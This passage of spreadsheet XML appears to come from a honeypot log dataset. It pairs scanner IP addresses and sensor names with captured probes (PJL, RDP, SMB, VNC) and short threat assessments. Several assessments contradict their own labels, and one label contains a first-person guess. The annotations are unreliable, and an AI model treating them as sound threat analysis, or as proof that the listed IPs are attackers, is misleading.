'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63186)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63194)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63210)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xmPNKGVYv'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qUqHfH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OLdYpz'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,58794)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,58796)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,58808)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63352)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63358)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63364)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=oVycRJ'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63570)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63582)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63598)}</t>
  </si>
  <si>
    <t>::ffff:c6eb:1832</t>
  </si>
  <si>
    <t>Unknown IRC connection attempt detected, suggesting potential malicious activity or reconnaissance. No further information is available from this single log entry. Further investigation is needed to determine the intent behind this action. &amp;&amp; The system attempted to access LDAP services but the attempt was unsuccessful as it could not obtain any relevant data indicating potential probing or reconnaissance activity. This may be an initial step by attackers to gather information before launching a full-scale attack. The lack of success in obtaining data suggests caution is needed to determine the intent behind this activity.</t>
  </si>
  <si>
    <t>LDAP Attack</t>
  </si>
  <si>
    <t>bffe8c70194df808e05cb0bbb00672fc</t>
  </si>
  <si>
    <t>172.81.60.236</t>
  </si>
  <si>
    <t>unassigned.172-81-60-236.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;65487&amp;&amp;53424&amp;&amp;50578&amp;&amp;61633&amp;&amp;56565&amp;&amp;60460&amp;&amp;58435&amp;&amp;64014&amp;&amp;57408&amp;&amp;49665&amp;&amp;53312&amp;&amp;51648&amp;&amp;65193&amp;&amp;50482&amp;&amp;51096&amp;&amp;62524&amp;&amp;58888&amp;&amp;60229&amp;&amp;63715&amp;&amp;64475</t>
  </si>
  <si>
    <t>::ffff:ac51:3cec</t>
  </si>
  <si>
    <t>No VNC (Virtual Network Computing) activity detected, which could be an evasion tactic to avoid detection or simply no connection attempt made to the service.</t>
  </si>
  <si>
    <t>887cf5fc2b430a2e5af4da96c70cb453</t>
  </si>
  <si>
    <t>172.81.62.243</t>
  </si>
  <si>
    <t>unassigned.172-81-62-243.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;59256&amp;&amp;22&amp;&amp;36277&amp;&amp;54093&amp;&amp;56755&amp;&amp;52528&amp;&amp;51417&amp;&amp;49658&amp;&amp;53384&amp;&amp;54086&amp;&amp;65102&amp;&amp;54415&amp;&amp;50507&amp;&amp;59299&amp;&amp;57228</t>
  </si>
  <si>
    <t>::ffff:ac51:3ef3</t>
  </si>
  <si>
    <t>Unknown VNC connection attempt, possible brute force or reconnaissance activity detected. No authentication information provided. Indicates potential vulnerability exploitation.</t>
  </si>
  <si>
    <t>VNC Attack</t>
  </si>
  <si>
    <t>efb990dc6025236c18f73d5091578db9</t>
  </si>
  <si>
    <t>59.88.80.120</t>
  </si>
  <si>
    <t>::ffff:3b58:5078</t>
  </si>
  <si>
    <t>No suspicious activity detected, TELNET service not accessed. No attempts made to connect or interact with this service. Service remains inactive. &amp;&amp; No TELNET activity detected, potentially indicating a targeted scan or attempted intrusion of this service.</t>
  </si>
  <si>
    <t>Telnet Brute &amp;&amp; PortScan 
(No activity detected)</t>
  </si>
  <si>
    <t>8661e3b25425aec3c285ff38f66d5f43</t>
  </si>
  <si>
    <t>193.32.249.168</t>
  </si>
  <si>
    <t>1109</t>
  </si>
  <si>
    <t>52.374</t>
  </si>
  <si>
    <t>4.88969</t>
  </si>
  <si>
    <t>39351</t>
  </si>
  <si>
    <t>31173 Services AB</t>
  </si>
  <si>
    <t>31173 Services Netherlands</t>
  </si>
  <si>
    <t>2019-10-08</t>
  </si>
  <si>
    <t>::ffff:c120:f9a8</t>
  </si>
  <si>
    <t>dbc34892dbd835c6285494e19c3742ff</t>
  </si>
  <si>
    <t>172.81.62.184</t>
  </si>
  <si>
    <t>unassigned.172-81-62-184.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;50297&amp;&amp;20802&amp;&amp;56193&amp;&amp;63263&amp;&amp;54221&amp;&amp;63100&amp;&amp;62971&amp;&amp;51306&amp;&amp;64275&amp;&amp;49221&amp;&amp;58295&amp;&amp;56534&amp;&amp;53150&amp;&amp;50958&amp;&amp;58561&amp;&amp;64282&amp;&amp;57468&amp;&amp;55957</t>
  </si>
  <si>
    <t>::ffff:ac51:3eb8</t>
  </si>
  <si>
    <t>45d6dad42e9ec487c7974226c716f9ea</t>
  </si>
  <si>
    <t>172.81.62.168</t>
  </si>
  <si>
    <t>unassigned.172-81-62-168.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_MT-CPA_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;65440&amp;&amp;9630&amp;&amp;62883&amp;&amp;64567&amp;&amp;54306&amp;&amp;60981&amp;&amp;55585&amp;&amp;54030&amp;&amp;49964&amp;&amp;49244&amp;&amp;49909&amp;&amp;59667&amp;&amp;64971&amp;&amp;49727&amp;&amp;57104&amp;&amp;53522&amp;&amp;58713&amp;&amp;55637&amp;&amp;50575&amp;&amp;61293</t>
  </si>
  <si>
    <t>::ffff:ac51:3ea8</t>
  </si>
  <si>
    <t>This suggests an attempt to connect to VNC service, but the connection was unsuccessful or the attempt was made anonymously. The lack of credentials indicates a potential port scanning or enumeration activity. This could be a reconnaissance phase before attempting to exploit the service further.</t>
  </si>
  <si>
    <t>a1fa8d967ffe265d4b4c459f54d85a21</t>
  </si>
  <si>
    <t>172.81.62.242</t>
  </si>
  <si>
    <t>unassigned.172-81-62-242.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H21</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53140&amp;&amp;63475&amp;&amp;3920&amp;&amp;59776&amp;&amp;64835&amp;&amp;62510&amp;&amp;54137&amp;&amp;61095&amp;&amp;50911&amp;&amp;57126&amp;&amp;56720&amp;&amp;49197&amp;&amp;60886&amp;&amp;59138&amp;&amp;63969&amp;&amp;63174&amp;&amp;64620&amp;&amp;61070&amp;&amp;55419&amp;&amp;51759</t>
  </si>
  <si>
    <t>::ffff:ac51:3ef2</t>
  </si>
  <si>
    <t>2eda07d37fd6b04aba74f81618301392</t>
  </si>
  <si>
    <t>103.220.214.246</t>
  </si>
  <si>
    <t>HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;5900&amp;&amp;23&amp;&amp;26893</t>
  </si>
  <si>
    <t>HoneyPot BlackListed IP</t>
  </si>
  <si>
    <t>Palghar</t>
  </si>
  <si>
    <t>Vāda</t>
  </si>
  <si>
    <t>1253610</t>
  </si>
  <si>
    <t>19.6535</t>
  </si>
  <si>
    <t>73.1481</t>
  </si>
  <si>
    <t>58678</t>
  </si>
  <si>
    <t>Intech Online Private Limited</t>
  </si>
  <si>
    <t>Rank Infratel Pvt Ltd</t>
  </si>
  <si>
    <t>2016-05-30</t>
  </si>
  <si>
    <t>RANKIN</t>
  </si>
  <si>
    <t>::ffff:67dc:d6f6</t>
  </si>
  <si>
    <t>1398a9e766081777c0d017af15fc1a9f</t>
  </si>
  <si>
    <t>172.81.62.204</t>
  </si>
  <si>
    <t>unassigned.172-81-62-204.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_MT-CPA_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;50180&amp;&amp;56391&amp;&amp;50179&amp;&amp;57957&amp;&amp;50168&amp;&amp;59098&amp;&amp;55293&amp;&amp;59495&amp;&amp;59285&amp;&amp;63226&amp;&amp;52851&amp;&amp;64552&amp;&amp;62098&amp;&amp;54078&amp;&amp;52193&amp;&amp;62019&amp;&amp;54285</t>
  </si>
  <si>
    <t>::ffff:ac51:3ecc</t>
  </si>
  <si>
    <t>No suspicious activity detected for VNC service, likely due to lack of connection attempts or legitimate usage. Normal operation for this service is expected, no malicious behavior identified. No notable events recorded for VNC connectivity.</t>
  </si>
  <si>
    <t>VNC Scanning</t>
  </si>
  <si>
    <t>dabc125ef03a821c16c2027f644f8a97</t>
  </si>
  <si>
    <t>172.81.62.166</t>
  </si>
  <si>
    <t>unassigned.172-81-62-166.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;23789&amp;&amp;61747&amp;&amp;52838&amp;&amp;55392&amp;&amp;63678&amp;&amp;58965&amp;&amp;59614&amp;&amp;51154&amp;&amp;50516&amp;&amp;54897&amp;&amp;52557&amp;&amp;57052&amp;&amp;64357&amp;&amp;58586&amp;&amp;50872&amp;&amp;53293&amp;&amp;55015</t>
  </si>
  <si>
    <t>::ffff:ac51:3ea6</t>
  </si>
  <si>
    <t>Unknown VNC connection attempt. This suggests an unauthorized access attempt to a remote desktop service. No further action was taken due to missing data or unknown source.</t>
  </si>
  <si>
    <t>dad2b66e3d758044039773ba0587bf97</t>
  </si>
  <si>
    <t>172.81.62.187</t>
  </si>
  <si>
    <t>unassigned.172-81-62-187.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53362&amp;&amp;65326&amp;&amp;63288&amp;&amp;52239&amp;&amp;59748&amp;&amp;64521&amp;&amp;65533&amp;&amp;51590&amp;&amp;59011</t>
  </si>
  <si>
    <t>::ffff:ac51:3ebb</t>
  </si>
  <si>
    <t>9067e556bb58b774f135bf1a86fdbab3</t>
  </si>
  <si>
    <t>172.81.62.203</t>
  </si>
  <si>
    <t>unassigned.172-81-62-203.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_MT-CPA_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;64953&amp;&amp;7305&amp;&amp;59336&amp;&amp;55869&amp;&amp;58931&amp;&amp;56394&amp;&amp;65284&amp;&amp;59422&amp;&amp;65024&amp;&amp;49932&amp;&amp;61884&amp;&amp;52942&amp;&amp;58532&amp;&amp;61710</t>
  </si>
  <si>
    <t>::ffff:ac51:3ecb</t>
  </si>
  <si>
    <t>This log indicates an attempt to access or connect using VNC (Virtual Network Computing) service but no further details are available as Data_VNC is marked as Not Available.
No successful connection was established and the activity appears to be a scan or probing attempt rather than a genuine login attempt.
The lack of data suggests that the potential threat might not have even reached the connection stage.</t>
  </si>
  <si>
    <t>PortScan 
(I'm assuming the "NA" stands for Not Attempted, but there is no VNC activity)</t>
  </si>
  <si>
    <t>c0931c238bf548e939b00dbe25a609a6</t>
  </si>
  <si>
    <t>172.81.62.205</t>
  </si>
  <si>
    <t>unassigned.172-81-62-205.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H4&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_MT-CPA_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;47418&amp;&amp;58454&amp;&amp;51846&amp;&amp;61972&amp;&amp;56550&amp;&amp;54804&amp;&amp;59273&amp;&amp;63952&amp;&amp;59158&amp;&amp;61338&amp;&amp;55563&amp;&amp;52471&amp;&amp;56613&amp;&amp;52994&amp;&amp;56064&amp;&amp;63671&amp;&amp;58481&amp;&amp;65039&amp;&amp;55112&amp;&amp;62709</t>
  </si>
  <si>
    <t>::ffff:ac51:3ecd</t>
  </si>
  <si>
    <t>a038afeb6e706ae7d1dc5057e23de99a</t>
  </si>
  <si>
    <t>172.81.62.189</t>
  </si>
  <si>
    <t>unassigned.172-81-62-189.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H15</t>
  </si>
  <si>
